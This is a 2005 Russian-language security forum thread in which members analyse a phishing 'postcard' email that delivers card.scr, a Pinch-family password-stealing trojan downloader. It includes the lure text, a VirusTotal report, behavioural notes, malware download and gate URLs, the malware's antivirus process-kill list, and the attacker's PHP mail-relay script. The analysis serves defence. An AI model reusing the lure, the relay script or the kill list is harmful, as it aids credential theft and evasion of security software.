Страница 1 из 3 123 Последняя
Показано с 1 по 20 из 50.

Внимание, открытка!

  1. #1
    Geser
    Guest

    Внимание, открытка!

    Сегодня получил такое письмо:

    Добрый день!
    Вам была отправлена открытка. Для того, чтобы получить ее,
    нужно зайти по ссылке

    hxxp://postcard.pp.ru/e64ed88dc8908cdd27532&/get/card.scr

    и нажать на кнопку "Открыть".
    Открытка будет доступна в течение двенадцати месяцев.

    Служба рассылки открыток
    http://www.postcard.ru/

    ----------------------------------------------------------------
    Чтобы не забывать поздравлять своих знакомых с днем рождения, вам достаточно теперь зайти в раздел
    "Напомнить" на сервере, и POSTCARD.RU вам не даст забыть об именинниках. Количество знакомых не ограничено!
    ----------------------------------------------------------------
    Все о туризме и отдыхе на www.alfatravel.ru! Тел.: (095)202-42-04
    ----------------------------------------------------------------
    Не хватает места в почтовом ящике? Тогда специально для Вас - почтовый сервис uMail.ru. Пользователи uMail.ru
    могут самостоятельно настраивать размер своих почтовых ящиков. uMail.ru - гарантия сохранности Вашей
    корреспонденции. Подробнее: http://umail.ru
    ----------------------------------------------------------------

    Hello!
    You've got a postcard. To view this postcard, click on the
    following link at anytime within the next 365 days

    hxxp://postcard.pp.ru/e64ed88dc8908cdd27532&/get/card.scr

    then switch to english version of site, and click on "get my postcard!"

    Greeting postcards at
    http://www.postcard.ru/
    По указанному адресу находится
    Код:
    This is a report processed by VirusTotal on 12/17/2005 at 13:14:17 (CET) after scanning the file "card.scr" file.
    Antivirus Version Update Result 
    AntiVir 6.33.0.61 12.16.2005 no virus found 
    Avast 4.6.695.0 12.16.2005 no virus found 
    AVG 718 12.15.2005 no virus found 
    Avira 6.33.0.61 12.16.2005 no virus found 
    BitDefender 7.2 12.17.2005 BehavesLike:Trojan.FirewallBypass 
    CAT-QuickHeal 8.00 12.16.2005 (Suspicious) - DNAScan 
    ClamAV devel-20051108 12.16.2005 no virus found 
    DrWeb 4.33 12.16.2005 no virus found 
    eTrust-Iris 7.1.194.0 12.17.2005 no virus found 
    eTrust-Vet 12.3.3.0 12.16.2005 no virus found 
    Fortinet 2.54.0.0 12.17.2005 suspicious 
    F-Prot 3.16c 12.15.2005 no virus found 
    Ikarus 0.2.59.0 12.17.2005 no virus found 
    Kaspersky 4.0.2.24 12.17.2005 Email-Worm.Win32.Monikey.j 
    McAfee 4652 12.16.2005 no virus found 
    NOD32v2 1.1326 12.16.2005 no virus found 
    Norman 5.70.10 12.16.2005 W32/Downloader 
    Panda 8.02.00 12.16.2005 no virus found 
    Sophos 4.01.0 12.16.2005 no virus found 
    Symantec 8.0 12.17.2005 no virus found 
    TheHacker 5.9.1.057 12.16.2005 no virus found 
    VBA32 3.10.5 12.16.2005 suspected of Trojan-PSW.LdPinch.12
    Как видно большинство антивирусов пока этого червячка не знают

  2. Реклама
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от Geser
    Как видно большинство антивирусов пока этого червячка не знают
    а это и не червячок, а банальный троян.

  4. #3
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Как и большинство вирусов, данный вирус не соответствует правилам Designed for Microsoft Windows XP. Главное несоответствие – вирус не работает без прав Administrator на Windows 2000/XP (NTFS), а это значит, что он не опасен тем, которые работают с правами “Limited User”.
    Проводил эксперимент с данным вирусом с правами “Limited User”:
    После запуска card.scr он создает файл 1(1).exe в папке %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\ и после этого он пытается скопировать файл 1(1).exe как C:\ntldr.exe но данное действие недоступно с правами “Limited User”. На этом процесс вируса заканчивается.
    Если все-таки разрешит вирусу создавать файлы в коренном каталоге системного диска, то card.scr создает файл C:\ntldr.exe и запускает его. Выскакивает надпись: “This software protected with UNREGISTRED copy of EXECryptor!”. После нажатие OK, программа завершает свою работу, не причинив некого вреда, и не внося, какие либо изменение в другие файлы и Registry. Вирус пытался добавить ключ в HKLM но данное действие недоступно без прав Administrator.

  5. #4
    Geser
    Guest
    Если это действительно модификация Пинча, то все пароли уже тю тю...

  6. #5
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от Geser
    Если это действительно модификация Пинча, то все пароли уже тю тю...
    в одном месте написано "XinchUser", а в другом ставит стартовую страницу посвященную pinch'у. но это действительно из семейства *inch.

    p.s. кто-нибудь распаковал файл 1.exe, который скачивает этот downloader?

  7. #6
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Небольшое исправление:
    Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe

    Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для HATTIFNATTOR
    Регистрация
    14.11.2004
    Адрес
    Russia
    Сообщений
    1,391
    Вес репутации
    206
    там же: 2.exe 5.exe

  9. #8
    Geser
    Guest
    Цитата Сообщение от Firza
    Небольшое исправление:
    Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe
    Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.
    Ну не знаю, может это кривой экземпляр. Стандартный Пинч украдёт все пароли из под ограниченного пользователя без проблем т.к. он их читает из реестра и с диска. Смотря к чему пароли

  10. #9
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от Firza
    Небольшое исправление:
    Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe
    совершенно верно

    Цитата Сообщение от Firza
    Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.
    вся работа файла card.scr - отправляет почту с логом c:\boot.txt, прописывается сервисом, создает ярлык, меняет настройки фаервола, убивает процесы по списку (самое смешное - некоторые повторяются),
    выкачивает 1.exe (если не путаю - упакован armadillo 4).

    рассчитан на русскоязычных жертв
    из-за логических ошибок работоспособен не на всех системах.

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от HATTIFNATTOR
    там же: 2.exe 5.exe
    файлик 2.exe поинтереснее будет.

    Файл 2.exe упакован FSG 1.33, размер 25504 байта.
    Устанавливает стартовую и поисковую страницу в Internet Explorer
    Прописывается как сервис TaskMgr.
    Создает ярлык со ссылкой на http://cards.mail.ru/card.html?id=b5...e422&user_id=1
    Скачивает файл http://parfum-club.ru/1.exe и сохраняет как c:\y.exe
    Имя пользователя - "lamer".
    Меняет настройки файервола.
    Собирает пароли от массы программ (как любой Pinch).
    Отправляет результаты почтой на xabarlar@mail.ru в виде упакованного аттача.
    Использует гейт по адресу http://alita-sochi.ru/mail.php

    Содержит список процессов антивирусов и файерволов (и других программ) для убиения:
    === begin ===
    nod32krn
    NOD32KUI
    VSMON
    ZAPRO
    APVDWIN
    PAVSRV51
    avpcc
    WEBPROXY
    navpw32
    Avp32
    PccPfw
    ATUPDATER
    ATUPDATER
    AUPDATE
    AUTODOWN
    AUTOTRACE
    AUTOUPDATE
    AVPUPD
    AVWUPD32
    KAVPF
    ва
    NOD32krn
    AVWUpSrv
    Ahnlab
    task
    Scheduler
    alerter
    AlertManger
    AVExch32Service
    avg7alrt
    avg7updsvc
    AvgCore
    AvgFsh
    AvgServ
    avpcc
    AVPCC
    AVUPDService
    AvxIni
    awhost32
    backweb client - 4476822
    === end ===

    а вот собственно и файлик mail.php:
    Код:
    <?
    $ip=getenv("REMOTE_ADDR");
    $email=$_POST['a'];
    $subject=$_POST['b']."(".$ip.")";
    $msg=$_POST['c'];
    $tmp = $msg;
    $msg=eregi_replace(" ","+",$tmp);
    $headers = "Content-Type: application/octet-stream; name=\"report.bin\"\n";
    $headers .= "Content-Transfer-Encoding: base64\n";
    $headers .= "Content-Disposition: attachment; filename=\"report.bin\"\n";
    mail($email, $subject, $msg, $headers);
    ?>
    
    <!-- REQUIRED -->
    <script language="JavaScript">
    window.status = "_ret_ok_1";
    </script></body></html>

  12. #11
    Geser
    Guest
    Написал администрации сайтов. Надеюсь уберут и трояна и скрипт

  13. #12
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Самое смешное, что упакованный 2.exe детектируется KAV как Trojan-PSW.Win32.PdPinch.aa, а распакованный детектируется KAV как Trojan-PSW.Win32.LdPinch.sh.
    Файл card.scr детектируется KAV как Email-Worm.Monikey.j (хотя сам рассылаться по почте не может). Другие файлы (1.exe, 5.exe) не детектируются.

    Результаты сканирования программой VBA:
    G:\card.scr : infected Email-Worm.Win32.Monikey.j
    G:\card.unp : infected Email-Worm.Win32.Monikey.j
    G:\1.exe : is suspected of Backdoor.xBot.13
    G:\2.exe : is suspected of Backdoor.Prorat.8
    G:\2.unp : is suspected of Backdoor.Prorat.8

    (ProRat тут совсем не в тему...)

    p.s. может у кого есть другие версии Monikey?
    Последний раз редактировалось MOCT; 18.12.2005 в 14:56.

  14. #13
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Цитата Сообщение от MOCT
    вся работа файла card.scr - отправляет почту с логом c:\boot.txt, прописывается сервисом, создает ярлык, меняет настройки фаервола, убивает процесы по списку (самое смешное - некоторые повторяются),
    выкачивает 1.exe
    Все эти замечательные действие (кроме создать ярлык) недоступны с правами “Limited User”, наверно по этому он у меня так и заработал. Хотя возможно упаковщику не понравилось пристальное внимание RegMon / FileMon.
    Цитата Сообщение от Geser
    Ну не знаю, может это кривой экземпляр. Стандартный Пинч украдёт все пароли из под ограниченного пользователя без проблем т.к. он их читает из реестра и с диска. Смотря к чему пароли
    Данный экземпляр у меня действительно нечего не крал. Эксперимент проводился под наблюдение RegMon / FileMon и там нет нечего подозрительного, что могло свидетельствовать о намерения красть пароль. А вот файл 2.ехе действительно интересней, в нем есть попытки воровать пароли от Opera, Mozilla, Total Commander, CuteFTP, WS_FTP. В отличии от 1.exe он не погибает сразу после запуска а продолжает быть активным, но функции:
    убиение антивирусов и firewall,
    прописка как Service,
    изменение настройки файервола,
    ему недоступны без прав Administrator.

  15. #14
    Geser
    Guest
    Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
    Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?

  16. #15
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от Geser
    Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
    Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?
    под админом ставятся все дистрибутивы, известные и легальные, а потом вся работа идет под продвинутым юзером. вот такая обычно практика.

  17. #16
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Цитата Сообщение от Geser
    Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
    Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?
    В общем, то это давно уже не так, есть очень много программ, которые работают с правами “Limited User” и даже очень большие по размеру (OpenOffice, FineReader, MS Office). Так что нет рациональных причин, почему программы не могут работать без прав Administrator, есть только иррациональные – лень и привычка “программистов – Administrators” писать программы только для себе подобных таких же Administrators .
    Я уже больше года как в основном работаю справами “Limited User”, и особых неудобств не испытывая, кругом только одни удобство – вирусы на нем плохо работают и очень хорошо можно обойтись без антивируса. Теперь я уже настолько заболел этим, что больше уже не вернусь в постоянную работу с правами Administrator. И если мне попадается нужная но “неправильная” программа, то лучше я потрачу несколько минут чтобы её “приручить” работать с правами “Limited User”, чем из-за одной “неправильная” программы, все остальные программы запускать с правами Administrator. В крайнем случаи “неправильную” программу можно запускать через Run As... (runas.exe) с правами Administrator.

  18. #17
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Цитата Сообщение от MOCT
    под админом ставятся все дистрибутивы, известные и легальные, а потом вся работа идет под продвинутым юзером. вот такая обычно практика.
    Если под “продвинутым юзером” надо понимать “Power User”, то работать под ним есть мало пользы для безопасности, правильно было бы работать под “Limited User”. Разница между правами “Administrator” и “Power User” настолько незначительные, что вообще непонятен смысл данной группы. По умолчанию “Power User” не может создавать новых пользователей и не может менять Permissions на чужие файлы и не может менять владельца чужим файлам, а все другие потенциально опасные действие ему доступны также как и Administrators.

  19. #18
    Geser
    Guest
    В общем, то это давно уже не так, есть очень много программ, которые работают с правами “Limited User”
    И еще больше таких которые не работают. Убедился на собственном опыте.

  20. #19
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.11.2005
    Сообщений
    91
    Вес репутации
    195
    Цитата Сообщение от Geser
    И еще больше таких которые не работают. Убедился на собственном опыте.
    Программы которые работают с правами “Limited User” не ограничиваются только OpenOffice, FineReader и MS Office их намного больше. Из широко известных:
    Opera,
    FireFox,
    WinRar,
    7-Zip,
    (почти) все программы Microsoft,
    Nero.
    И большинство тех программ, которые наработают легко можно научить это делать. В основном проблема неработоспособности программ под “Limited User” кроется в том, что они хранят свои настройки в той папке, где она установлена (%ProgramFiles%\Bad-program) или в Registry - HKLM, а это является прямим нарушением правил Designed for Microsoft Windows XP (весь 3. пункт). Данные место недоступны для редактирование с правами “Limited User”, по этому программы и не работают. В основном проблема решается за несколько минут путём изменений в Permissions соответствующих файлов и ключей Registry. Настроить среднестатистический офисный компьютер для работы с правами “Limited User” большего труда не составляет, можно даже запретить запускать исполняемые файлы из неположенных мест и потом можно спать спокойно – вирусов не будет, даже если пользователь будет сильно стараться их получить. Пользователи сами на рабочем компьютере не должны устанавливать какие либо программы – это работа Администратора. А в наше время полагаться на антивирусы не стоит – они уже доказали что неспособны бороться с вирусами.

  21. #20
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для MOCT
    Регистрация
    09.09.2005
    Адрес
    Russia
    Сообщений
    1,718
    Вес репутации
    132
    Цитата Сообщение от Firza
    Программы которые работают с правами “Limited User”
    ...
    (почти) все программы Microsoft
    очень смешно.
    оказывается, некоторые программы от Микрософт не работают под операционкой от Микрософт...

    Цитата Сообщение от Firza
    И большинство тех программ, которые наработают легко можно научить это делать. В основном проблема неработоспособности программ под “Limited User” кроется в том, что они хранят свои настройки в той папке, где она установлена (%ProgramFiles%\Bad-program) или в Registry - HKLM, а это является прямим нарушением правил Designed for Microsoft Windows XP (весь 3. пункт).
    разработчиков, кто читал эти правила, еще поискать надо. по крайней мере в нашей стране.
    на самом деле тут нужно только логическое мышление, а читать правила не обязательно. hklm это общее для всей машины, а hkcu - собственное для каждого пользователя. если подумать над тем, что не все пользователи будут работать с устанавливаемым софтом (и даже захотят видеть его в своем профиле), то логичнее писаться в current user

    Цитата Сообщение от Firza
    Настроить среднестатистический офисный компьютер для работы с правами “Limited User” большего труда не составляет, можно даже запретить запускать исполняемые файлы из неположенных мест и потом можно спать спокойно – вирусов не будет, даже если пользователь будет сильно стараться их получить. Пользователи сами на рабочем компьютере не должны устанавливать какие либо программы – это работа Администратора. А в наше время полагаться на антивирусы не стоит – они уже доказали что неспособны бороться с вирусами.
    падает не только уровень поьзователей, но и уровень администраторов.
    так что ручная настройка не каждому админу по плечу. (вот такой каламбур получился)

Страница 1 из 3 123 Последняя

Похожие темы

  1. Зловещая открытка - 2
    От Z-first в разделе Помогите!
    Ответов: 6
    Последнее сообщение: 24.01.2008, 20:23
  2. Зловещая открытка
    От Z-first в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 22.01.2008, 23:07
  3. Обратите внимание
    От Spirit в разделе Помогите!
    Ответов: 9
    Последнее сообщение: 10.02.2006, 16:36
  4. Ответов: 0
    Последнее сообщение: 22.09.2005, 17:26
  5. Внимание! еще раз о варезе!
    От egik в разделе Общая сетевая безопасность
    Ответов: 0
    Последнее сообщение: 14.04.2005, 14:19

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00653 seconds with 20 queries